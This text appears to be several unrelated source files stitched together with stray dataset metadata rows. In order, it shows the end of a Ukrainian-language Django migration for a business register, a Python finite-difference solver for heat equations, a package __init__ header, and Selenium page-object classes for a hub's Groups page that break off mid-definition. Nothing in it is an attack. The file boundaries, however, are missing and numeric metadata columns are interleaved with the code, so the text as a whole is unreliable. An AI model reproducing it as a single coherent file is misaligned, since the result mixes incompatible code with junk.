name='edrpou',
field=models.CharField(db_index=True, max_length=260, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='company',
name='name',
field=models.CharField(max_length=500, null=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='company',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='business_register.Company', verbose_name='є підрозділом компанії/організації'),
),
migrations.AlterField(
model_name='company',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='company',
name='registration_info',
field=models.CharField(max_length=450, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='company',
name='short_name',
field=models.CharField(max_length=500, null=True, verbose_name='коротка назва'),
),
migrations.AlterField(
model_name='company',
name='status',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='companytokved',
name='kved',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.Kved', verbose_name='КВЕД'),
),
migrations.AlterField(
model_name='companytokved',
name='primary_kved',
field=models.BooleanField(default=False, verbose_name='зазначений як основний'),
),
migrations.AlterField(
model_name='companytopredecessor',
name='company',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='predecessors', to='business_register.Company', verbose_name='є попередником організації'),
),
migrations.AlterField(
model_name='companytype',
name='name',
field=models.CharField(max_length=270, null=True, unique=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='exchangedatacompany',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='exchangedatafop',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='exchangedatafop',
name='fop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='exchange_data', to='business_register.Fop', verbose_name='ФОП'),
),
migrations.AlterField(
model_name='exchangedatafop',
name='taxpayer_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='data_ocean.TaxpayerType', verbose_name='тип платника податків'),
),
migrations.AlterField(
model_name='fop',
name='address',
field=models.CharField(max_length=500, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='fop',
name='authority',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='fop',
name='contact_info',
field=models.CharField(max_length=200, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='fop',
name='fullname',
field=models.CharField(max_length=100, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='fop',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='fop',
name='registration_info',
field=models.CharField(max_length=300, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='fop',
name='status',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='foptokved',
name='fop',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='kveds', to='business_register.Fop', verbose_name='ФОП'),
),
migrations.AlterField(
model_name='foptokved',
name='kved',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.Kved', verbose_name='КВЕД'),
),
migrations.AlterField(
model_name='foptokved',
name='primary_kved',
field=models.BooleanField(default=False, verbose_name='зазначений як основний'),
),
migrations.AlterField(
model_name='founder',
name='address',
field=models.CharField(max_length=2015, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='founder',
name='company',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='founders', to='business_register.Company', verbose_name='є засновником компанії/організації'),
),
migrations.AlterField(
model_name='founder',
name='edrpou',
field=models.CharField(max_length=9, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='founder',
name='equity',
field=models.FloatField(null=True, verbose_name='участь в статутному капіталі'),
),
migrations.AlterField(
model_name='founder',
name='info',
field=models.CharField(max_length=2015, verbose_name='наявні дані'),
),
migrations.AlterField(
model_name='founder',
name='name',
field=models.TextField(null=True, verbose_name="назва/повне ім'я"),
),
migrations.AlterField(
model_name='historicalassignee',
name='company',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Company', verbose_name='є правонаступником'),
),
migrations.AlterField(
model_name='historicalassignee',
name='edrpou',
field=models.CharField(max_length=11, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='historicalassignee',
name='name',
field=models.CharField(max_length=610, null=True, verbose_name='правонаступник'),
),
migrations.AlterField(
model_name='historicalcompany',
name='address',
field=models.CharField(max_length=1000, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='historicalcompany',
name='authority',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='historicalcompany',
name='authorized_capital',
field=models.FloatField(null=True, verbose_name='статутний капітал'),
),
migrations.AlterField(
model_name='historicalcompany',
name='bylaw',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Bylaw', verbose_name='статут'),
),
migrations.AlterField(
model_name='historicalcompany',
name='company_type',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.CompanyType', verbose_name='організаційно-правова форма'),
),
migrations.AlterField(
model_name='historicalcompany',
name='contact_info',
field=models.CharField(max_length=310, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='historicalcompany',
name='edrpou',
field=models.CharField(db_index=True, max_length=260, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='historicalcompany',
name='name',
field=models.CharField(max_length=500, null=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='historicalcompany',
name='parent',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Company', verbose_name='є підрозділом компанії/організації'),
),
migrations.AlterField(
model_name='historicalcompany',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='historicalcompany',
name='registration_info',
field=models.CharField(max_length=450, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='historicalcompany',
name='short_name',
field=models.CharField(max_length=500, null=True, verbose_name='коротка назва'),
),
migrations.AlterField(
model_name='historicalcompany',
name='status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='historicalfop',
name='address',
field=models.CharField(max_length=500, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='historicalfop',
name='authority',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Authority', verbose_name='орган реєстрації'),
),
migrations.AlterField(
model_name='historicalfop',
name='contact_info',
field=models.CharField(max_length=200, null=True, verbose_name='контакти'),
),
migrations.AlterField(
model_name='historicalfop',
name='fullname',
field=models.CharField(max_length=100, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='historicalfop',
name='registration_date',
field=models.DateField(null=True, verbose_name='дата реєстрації'),
),
migrations.AlterField(
model_name='historicalfop',
name='registration_info',
field=models.CharField(max_length=300, null=True, verbose_name='реєстраційні дані'),
),
migrations.AlterField(
model_name='historicalfop',
name='status',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='data_ocean.Status', verbose_name='статус'),
),
migrations.AlterField(
model_name='historicalfounder',
name='address',
field=models.CharField(max_length=2015, null=True, verbose_name='адреса'),
),
migrations.AlterField(
model_name='historicalfounder',
name='company',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='business_register.Company', verbose_name='є засновником компанії/організації'),
),
migrations.AlterField(
model_name='historicalfounder',
name='edrpou',
field=models.CharField(max_length=9, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='historicalfounder',
name='equity',
field=models.FloatField(null=True, verbose_name='участь в статутному капіталі'),
),
migrations.AlterField(
model_name='historicalfounder',
name='info',
field=models.CharField(max_length=2015, verbose_name='наявні дані'),
),
migrations.AlterField(
model_name='historicalfounder',
name='name',
field=models.TextField(null=True, verbose_name="назва/повне ім'я"),
),
migrations.AlterField(
model_name='historicalsigner',
name='name',
field=models.CharField(max_length=390, null=True, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='kved',
name='code',
field=models.CharField(max_length=10, verbose_name='код'),
),
migrations.AlterField(
model_name='kved',
name='division',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedDivision', verbose_name='розділ'),
),
migrations.AlterField(
model_name='kved',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedGroup', verbose_name='група'),
),
migrations.AlterField(
model_name='kved',
name='is_valid',
field=models.BooleanField(default=True, verbose_name='є чинним'),
),
migrations.AlterField(
model_name='kved',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='kved',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedSection', verbose_name='секція'),
),
migrations.AlterField(
model_name='kveddivision',
name='code',
field=models.CharField(max_length=10, unique=True, verbose_name='код'),
),
migrations.AlterField(
model_name='kveddivision',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='kveddivision',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedSection', verbose_name='секція'),
),
migrations.AlterField(
model_name='kvedgroup',
name='code',
field=models.CharField(max_length=10, unique=True, verbose_name='код'),
),
migrations.AlterField(
model_name='kvedgroup',
name='division',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedDivision', verbose_name='розділ'),
),
migrations.AlterField(
model_name='kvedgroup',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='kvedgroup',
name='section',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='business_register.KvedSection', verbose_name='секція'),
),
migrations.AlterField(
model_name='kvedsection',
name='code',
field=models.CharField(max_length=10, unique=True, verbose_name='код'),
),
migrations.AlterField(
model_name='kvedsection',
name='name',
field=models.CharField(max_length=500, verbose_name='назва'),
),
migrations.AlterField(
model_name='predecessor',
name='edrpou',
field=models.CharField(max_length=405, null=True, verbose_name='код ЄДРПОУ'),
),
migrations.AlterField(
model_name='predecessor',
name='name',
field=models.CharField(max_length=500, null=True, verbose_name='назва'),
),
migrations.AlterField(
model_name='signer',
name='name',
field=models.CharField(max_length=390, null=True, verbose_name="повне ім'я"),
),
migrations.AlterField(
model_name='terminationstarted',
name='reason',
field=models.TextField(null=True, verbose_name='підстава'),
),
]
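# A minimal sketch (an assumption for illustration, not part of this migration)
# of the model declaration that an AlterField like the ones above mirrors;
# verbose_name-only changes affect Django's migration state, not the database schema:
#
#     edrpou = models.CharField(max_length=11, null=True, verbose_name='код ЄДРПОУ')
#
# `python manage.py sqlmigrate <app> <migration>` can confirm this: for
# verbose_name-only alterations it typically emits no SQL.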
| 43.632432
| 229
| 0.605261
| 2,290
| 24,216
| 6.219651
| 0.08952
| 0.089588
| 0.159728
| 0.185284
| 0.875728
| 0.858176
| 0.786843
| 0.760935
| 0.754757
| 0.750263
| 0
| 0.009889
| 0.269202
| 24,216
| 554
| 230
| 43.711191
| 0.794937
| 0.001858
| 0
| 0.857664
| 1
| 0
| 0.20609
| 0.029625
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.00365
| 0
| 0.009124
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8a509dd7207a5255829a2614b9166b8eb4d97549
| 213
|
py
|
Python
|
docsexp/__init__.py
|
AgentDS/DocsExp
|
c1279091163314684a769972cfd21267214565a1
|
[
"MIT"
] | null | null | null |
docsexp/__init__.py
|
AgentDS/DocsExp
|
c1279091163314684a769972cfd21267214565a1
|
[
"MIT"
] | null | null | null |
docsexp/__init__.py
|
AgentDS/DocsExp
|
c1279091163314684a769972cfd21267214565a1
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# @Time : 3/13/21 3:00 PM
# @Author : Siqi Liang
# @Contact : zszxlsq@gmail.com
# @File : __init__.py
# @Software: PyCharm
from docsexp.models import *
| 21.3
| 30
| 0.638498
| 30
| 213
| 4.4
| 0.833333
| 0.166667
| 0.257576
| 0.348485
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.052941
| 0.201878
| 213
| 9
| 31
| 23.666667
| 0.723529
| 0.661972
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8a6c9b601468e1320df481114c9645ba2316ddae
| 4,925
|
py
|
Python
|
code/ex2.py
|
CYZhao0709/The-Numerical-Method-Of-Differential-Equation
|
f916613298b92306044753a755da5e6843ef2fd9
|
[
"Apache-2.0"
] | 1
|
2018-01-01T05:01:13.000Z
|
2018-01-01T05:01:13.000Z
|
code/ex2.py
|
CYZhao0709/The-Numerical-Method-Of-Differential-Equation
|
f916613298b92306044753a755da5e6843ef2fd9
|
[
"Apache-2.0"
] | null | null | null |
code/ex2.py
|
CYZhao0709/The-Numerical-Method-Of-Differential-Equation
|
f916613298b92306044753a755da5e6843ef2fd9
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import numpy as np
import math
"""
Sun. Dec 12th 2017, 11:36
@author: Yuzhao Chen
"""
def initTime(xs, problem=1):
if problem == 1:
return [2 * np.sin(2 * math.pi * x) for x in xs]
elif problem == 2:
return [np.sin(math.pi * x) + x * (1 - x) for x in xs]
else:
raise ValueError("Invalid Input.")
def initBorder(t, problem=1):
if problem == 1:
return 0
elif problem == 2:
return 0
else:
raise ValueError("Invalid Input.")
def precisionSolution(x,t,problem=1):
if problem==1:
return 2 * math.e**(- math.pi**2 / 4 * t) * np.sin(2 * math.pi * x)
elif problem == 2:
return math.e**(-t * math.pi**2) * np.sin(math.pi * x) + x * (1 - x)
else:
raise ValueError("Invalid Input.")
def forward(M, N, ex=1):
if ex==1:
a = 1 / 16
        Fn = np.zeros((N, M - 1))  # problem-specific: the source term Fn is constant
x1 = 0
x2 = 1
t1 = 0
t2 = 1
    elif ex == 2:
        a = 1
        Fn = np.ones((N, M - 1)) * 2  # problem-specific: the source term Fn is constant
        x1 = 0
        x2 = 1
        t1 = 0
        t2 = 2
    else:
        raise ValueError("Invalid Input.")
    h = (x2 - x1) / M  # spatial step size (x-axis)
    k = (t2 - t1) / N  # time step size (t-axis)
    print("spatial step:", h, end=',')
    print("time step:", k)
    r = a * k / (h**2)  # mesh ratio
    print("r value (stable when < 1/2):", r)
    xs = np.arange(x1, x2 + h, h)  # spatial grid nodes
    ts = np.arange(t1, t2 + k, k)  # time grid nodes
    U = np.zeros((N, M-1))  # rows index time levels, columns index interior space nodes
U[0][0] = U[0][-1] = 0
U[0] = initTime(xs[1:-1], problem=ex)
I = np.eye(M-1)
C = np.eye(M-1, k=1) + np.eye(M-1, k=-1)
for i in range(1, U.shape[0]):
U[i] = np.dot((1 - 2*r) * I + r * C, U[i-1]) + k * Fn[i-1]
UTrue = np.zeros((N, M-1))
UTrue[0] = U[0]
i = 0
for t in ts[1:-1]:
i += 1
j = -1
for x in xs[1:-1]:
j += 1
UTrue[i][j] = precisionSolution(x,t, problem=ex)
U_array = U.reshape(1, N * (M-1))
UTrue_array = UTrue.reshape(1, N * (M-1))
return U, UTrue, np.linalg.norm(U_array - UTrue_array)
def backward(M, N, ex=1):
if ex==1:
a = 1 / 16
        Fn = np.zeros((N, M - 1))  # problem-specific: the source term Fn is constant
x1 = 0
x2 = 1
t1 = 0
t2 = 1
    elif ex == 2:
        a = 1
        Fn = np.ones((N, M - 1)) * 2  # problem-specific: the source term Fn is constant
        x1 = 0
        x2 = 1
        t1 = 0
        t2 = 2
    else:
        raise ValueError("Invalid Input.")
    h = (x2 - x1) / M  # spatial step size (x-axis)
    k = (t2 - t1) / N  # time step size (t-axis)
    print("spatial step:", h, end=',')
    print("time step:", k)
    r = a * k / (h**2)  # mesh ratio
    print("r value (unconditionally stable):", r)
    xs = np.arange(x1, x2 + h, h)  # spatial grid nodes
    ts = np.arange(t1, t2 + k, k)  # time grid nodes
    U = np.zeros((N, M-1))  # rows index time levels, columns index interior space nodes
U[0] = initTime(xs[1:-1], problem=ex)
I = np.eye(M-1)
C = np.eye(M-1, k=1) + np.eye(M-1, k=-1)
for i in range(1, U.shape[0]):
U[i] = np.linalg.solve((1 + 2*r)*I - r*C, U[i-1] + k*Fn[i])
UTrue = np.zeros((N, M-1))
UTrue[0] = U[0]
i = 0
for t in ts[1:-1]:
i += 1
j = -1
for x in xs[1:-1]:
j += 1
UTrue[i][j] = precisionSolution(x,t, problem=ex)
U_array = U.reshape(1, N * (M-1))
UTrue_array = UTrue.reshape(1, N * (M-1))
return U, UTrue, np.linalg.norm(U_array - UTrue_array)
def sixPoint(M, N, ex=1):
if ex==1:
a = 1 / 16
        Fn = np.zeros((N, M - 1))  # problem-specific: the source term Fn is constant
x1 = 0
x2 = 1
t1 = 0
t2 = 1
    elif ex == 2:
        a = 1
        Fn = np.ones((N, M - 1)) * 2  # problem-specific: the source term Fn is constant
        x1 = 0
        x2 = 1
        t1 = 0
        t2 = 2
    else:
        raise ValueError("Invalid Input.")
    h = (x2 - x1) / M  # spatial step size (x-axis)
    k = (t2 - t1) / N  # time step size (t-axis)
    print("spatial step:", h, end=',')
    print("time step:", k)
    r = a * k / (h**2)  # mesh ratio
    print("r value (unconditionally stable):", r)
    xs = np.arange(x1, x2 + h, h)  # spatial grid nodes
    ts = np.arange(t1, t2 + k, k)  # time grid nodes
    U = np.zeros((N, M-1))  # rows index time levels, columns index interior space nodes
U[0] = initTime(xs[1:-1], problem=ex)
I = np.eye(M-1)
C = np.eye(M-1, k=1) + np.eye(M-1, k=-1)
for i in range(1, U.shape[0]):
U[i] = np.linalg.solve((1 + r)*I - 0.5*r*C, np.dot((1-r)*I+0.5*r*C,U[i-1]) + 0.5*k*(Fn[i]+Fn[i-1]))
UTrue = np.zeros((N, M-1))
UTrue[0] = U[0]
i = 0
for t in ts[1:-1]:
i += 1
j = -1
for x in xs[1:-1]:
j += 1
UTrue[i][j] = precisionSolution(x,t, problem=ex)
U_array = U.reshape(1, N * (M-1))
UTrue_array = UTrue.reshape(1, N * (M-1))
return U, UTrue, np.linalg.norm(U_array - UTrue_array)
# alternative parameter sets: [4,4],[8,16],[8,8],[16,32],[32, 64]
for x, y in [[4, 100], [8, 400], [4, 200], [8, 800], [8, 200]]:
    print("number of spatial nodes:", x, end=',')
    print("number of time nodes:", y)
    result = sixPoint(x, y, ex=2)
    print("L2 norm of the difference (error):", result[2])
    print()
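# A minimal usage sketch (the parameter choices below are assumptions for
# illustration): compare the three schemes above on problem 1, where the
# explicit scheme is stable only for mesh ratio r < 1/2.
for name, scheme in [("forward", forward), ("backward", backward), ("six-point", sixPoint)]:
    print("scheme:", name)
    _, _, err = scheme(8, 200, ex=1)
    print("L2 error:", err)
    print()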
| 24.261084
| 108
| 0.425787
| 846
| 4,925
| 2.464539
| 0.124113
| 0.025899
| 0.025899
| 0.038849
| 0.830216
| 0.821103
| 0.759712
| 0.717026
| 0.702638
| 0.702638
| 0
| 0.089785
| 0.375838
| 4,925
| 202
| 109
| 24.381188
| 0.588484
| 0.057259
| 0
| 0.849673
| 0
| 0
| 0.030776
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.039216
| false
| 0
| 0.013072
| 0
| 0.111111
| 0.084967
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8a7032a7aac9a23be7f7fa9092eae4f1dcc5adc2
| 13,888
|
py
|
Python
|
hubcheck/pageobjects/widgets/groups.py
|
codedsk/hubcheck
|
2ff506eb56ba00f035300862f8848e4168452a17
|
[
"MIT"
] | 1
|
2016-02-13T13:42:23.000Z
|
2016-02-13T13:42:23.000Z
|
hubcheck/pageobjects/widgets/groups.py
|
codedsk/hubcheck
|
2ff506eb56ba00f035300862f8848e4168452a17
|
[
"MIT"
] | null | null | null |
hubcheck/pageobjects/widgets/groups.py
|
codedsk/hubcheck
|
2ff506eb56ba00f035300862f8848e4168452a17
|
[
"MIT"
] | null | null | null |
from hubcheck.pageobjects.basepagewidget import BasePageWidget
from hubcheck.pageobjects.basepageelement import Button
from hubcheck.pageobjects.basepageelement import Link
from hubcheck.pageobjects.basepageelement import Text
class Groups1(BasePageWidget):
def __init__(self, owner, locatordict={}):
super(Groups1,self).__init__(owner,locatordict)
# load hub's classes
object_locators = self.load_class('Groups_Locators')
PopularList = self.load_class('PopularList')
PopularItem = self.load_class('PopularItem')
TextSearchBox = self.load_class('TextSearchBox')
# update this object's locator
self.locators.update(object_locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# setup page object's components
self.faq = Link(self,{'base':'faq'})
self.guidelines = Link(self,{'base':'guidelines'})
self.create = Link(self,{'base':'create'})
self.browse = Link(self,{'base':'browse'})
self.group_search = TextSearchBox(self,
{'base' : 'searchgroups',
'text' : 'searchi',
'submit' : 'searchb'})
self.popular_groups = PopularList(self,
{'base' : 'popularitem',
'item' : 'popularitem'},
PopularItem,
{'title' : 'pi_title',
'description' : 'pi_description',
'logo' : 'pi_logo'})
        # update the components' locators with this object's overrides
self._updateLocators()
def goto_faq(self):
"""click the faq link"""
self.faq.click()
def goto_guidelines(self):
"""click the guidelines link"""
self.guidelines.click()
def goto_create_group(self):
"""click the create group link"""
self.create.click()
def goto_browse_list(self):
"""click the browse list of groups link"""
self.browse.click()
def search_groups(self,terms):
"""click the search groups link"""
return self.group_search.search_for(terms)
def get_popular_groups(self):
"""return the list of popular group names"""
groups = [group.value()['title'] \
for group in iter(self.popular_groups)]
return groups
def goto_popular_group(self,group_name):
"""click the group in the popular group list"""
group = self.popular_groups.get_item_by_property('title',group_name)
return group.goto_group()
def has_info_no_popular_groups(self):
"""check if the 'no popular groups' info block is displayed"""
return self.is_displayed(locator=self.locators['popularinfo'])
class Groups1_Locators_Base(object):
"""locators for Groups object"""
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#introduction .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.browse a",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
}
class Groups1_Locators_Base_2(object):
"""locators for Groups object"""
# new create locator
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.browse a",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
# 'popularitem' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups1_Locators_Base_3(object):
"""locators for Groups object"""
# new create locator
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#useroptions .group",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.browse a",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups1_Locators_Base_4(object):
"""locators for Groups object"""
# new create locator
locators = {
'base' : "css=#content",
'faq' : "css=#introduction li:nth-of-type(1) a",
'guidelines' : "css=#introduction li:nth-of-type(2) a",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups1_Locators_Base_5(object):
"""
locators for Groups object
updated faq and guidelines locators for 1.1.2
"""
locators = {
'base' : "css=#content",
'faq' : "css=.group-intro-faqs",
'guidelines' : "css=.group-intro-guidelines",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
'pi_description': "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//p",
'pi_logo' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'logo')]//img",
}
class Groups2(BasePageWidget):
"""
Groups page for 1.1.5, 1.2.0
"""
def __init__(self, owner, locatordict={}):
super(Groups2,self).__init__(owner,locatordict)
# load hub's classes
object_locators = self.load_class('Groups_Locators')
PopularList = self.load_class('PopularList')
PopularItem = self.load_class('PopularItem')
TextSearchBox = self.load_class('TextSearchBox')
# update this object's locator
self.locators.update(object_locators.locators)
# update the locators with those from the owner
self.update_locators_from_owner()
# setup page object's components
self.need_help = Link(self,{'base':'need_help'})
self.create = Link(self,{'base':'create'})
self.browse = Link(self,{'base':'browse'})
self.group_search = TextSearchBox(self,
{'base' : 'searchgroups',
'text' : 'searchi',
'submit' : 'searchb'})
self.popular_groups = PopularList(self,
{'base' : 'popularitem',
'item' : 'popularitem'},
PopularItem,
{'title' : 'pi_title',
'description' : 'pi_description',
'logo' : 'pi_logo'})
        # update the components' locators with this object's overrides
self._updateLocators()
def goto_need_help(self):
"""click the guidelines link"""
self.need_help.click()
def goto_create_group(self):
"""click the create group link"""
self.create.click()
def goto_browse_list(self):
"""click the browse list of groups link"""
self.browse.click()
def search_groups(self,terms):
"""click the search groups link"""
return self.group_search.search_for(terms)
def get_popular_groups(self):
"""return the list of popular group names"""
groups = [group.value()['title'] \
for group in iter(self.popular_groups)]
return groups
def goto_popular_group(self,group_name):
"""click the group in the popular group list"""
group = self.popular_groups.get_item_by_property('title',group_name)
return group.goto_group()
def has_info_no_popular_groups(self):
"""check if the 'no popular groups' info block is displayed"""
return self.is_displayed(locator=self.locators['popularinfo'])
class Groups2_Locators_Base_1(object):
"""
locators for Groups object
removed faq and guidelines links
added need_help link
hub version 1.1.5
"""
locators = {
'base' : "css=#content",
'need_help' : "css=#introduction .aside .popup",
'create' : "css=#useroptions .add",
'searchgroups' : "css=form.search",
'searchi' : "css=#gsearch",
'searchb' : "css=.search [type='submit']",
'browse' : "css=.group-intro-browse",
'popularinfo' : "css=.section > div:nth-of-type(4) .info",
'popularitem' : "css=.section > div:nth-of-type(4) .group-list",
'pi_title' : "xpath=//*[contains(@class,'group-list')]/../../div[%s]//*[contains(@class,'details-w-logo')]//h3//a",
